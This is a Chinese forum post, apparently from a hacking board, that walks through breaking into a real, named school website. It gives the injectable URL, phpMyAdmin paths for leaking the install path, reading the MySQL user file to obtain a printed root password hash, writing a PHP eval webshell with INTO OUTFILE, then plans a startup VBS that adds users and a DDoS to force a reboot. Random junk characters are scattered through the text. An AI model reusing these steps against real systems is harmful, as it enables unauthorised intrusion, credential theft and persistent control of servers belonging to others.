友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
+ o; i2 ]! }& ]$ h

) x4 F- j& v" W: _2 j
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

) Q5 F# K- ?- _! G- t那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
% e* Q- b' d6 t/ R4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
9 A9 x) G2 C' c3 d6./phpmyadmin/libraries/lect_lang.lib.php  
7 r, c- O" A; T9 X& m' k/ a7./phpmyadmin/libraries/mcrypt.lib.php   
; g" g; u- U3 h7 D8./phpmyadmin/libraries/export/xls.php  
. Y9 E. B* U5 p3 A, Y
) a6 H  E( m7 V: Q' c. ]2 c) |均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

6 D' o+ g9 A& O* c" h权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
& ^$ K4 T" |7 j) v2 E+ V/ |: [/ w  X
) t2 x  t% q1 m- r& S默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
, N" G5 k! A3 |& i- o" L
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

% X4 |) j3 _- |: D0 X想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

9 a6 A2 x+ t2 g" W  P  o. z自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
5 @' U) P1 B3 A' I& J( K$ p+ z$ f
成功读到root密码：

5 K  U2 a$ E* h+ |17---- r(0072)
18---- o(006f)
19---- o(006f)
  r0 u: p: X! j0 N20---- t(0074)
21---- *(002a)
7 D3 W8 d, l7 n/ [) F% E5 [/ T3 ]22---- 8(0038)
23---- 2(0032)
0 `; P+ v4 c- |24---- E(0045)
25---- 1(0031)
  U- j+ U8 _& r6 B26---- C(0043)
6 |- w) u. h4 L8 R8 f5 w7 t4 M( A% d27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
+ Q5 A' z; W, s30---- 8(0038)
2 a% g2 K0 F8 C" b$ K; n31---- A(0041)
7 T& _' B7 N* {32---- 9(0039)
$ L- U! {# N1 [$ H33---- B(0042)
1 K, j; N+ |% C" M5 ~34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
% ~  n8 N$ ?2 c: Q$ K, w38---- 4(0034)
! a) d* Q, t( ^; v" l39---- 9(0039)
40---- 1(0031)
/ S5 s3 z. a8 _41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
% \$ V5 a4 A9 A: q45---- 9(0039)
: Y& N# I) k- {46---- 8(0038)
+ O# R6 `( e* R; d7 A5 d( M3 w1 V; g47---- F(0046)
0 {# Y8 I/ A1 \0 t48---- F(0046)
8 B# |+ @: G/ D" }' |9 r7 m* L49---- 4(0034)
50---- F(0046)
51---- 0(0030)
# ]4 `( u+ r* N2 X( c+ D52---- 3(0033)
: u+ m5 K1 v# b  O1 I4 K53---- 2(0032)
54---- A(0041)
55---- 4(0034)
56---- A(0041)
57---- B(0042)
58---- *(0044)
- T2 Q$ q6 d% j59---- *(0035)
3 V" D6 G' i! I5 M+ j. T$ }60---- *(0041)
61---- *0032)

解密后成功登陆phpmyamin
                          
8 [" o0 @- }" Q0 \
                             
; X' a! d/ u; f) h& ~
3 O& ~1 q& w4 T/ h& a- f4 F+ `找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

, ?) M" g1 j( V4 m; \: E  ]成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
8 ]! n4 x2 i. c* f  k2 |  M
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

+ m' Y/ P& @' `; ]/ @: E

-------------------------------------------------------------------------------
admin
Administrator
2 q- y& q: q  ^# {) m# P4 E% e7 e6 `: Jslipper$
' U+ ?1 @9 ]$ j7 F$ E4 M' B% f- D, fsqluser
命令成功完成。
  D% ^5 F1 R" j9 ^1 R
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
) [0 I: a- H! g. O
ddos服务器重启，不然就只能坐等服务器重启了...............................
# b3 }9 m' k5 V) }/ B) ]
- B* Z& R5 }2 T. P0 h) ^4 H+ S( h      

angel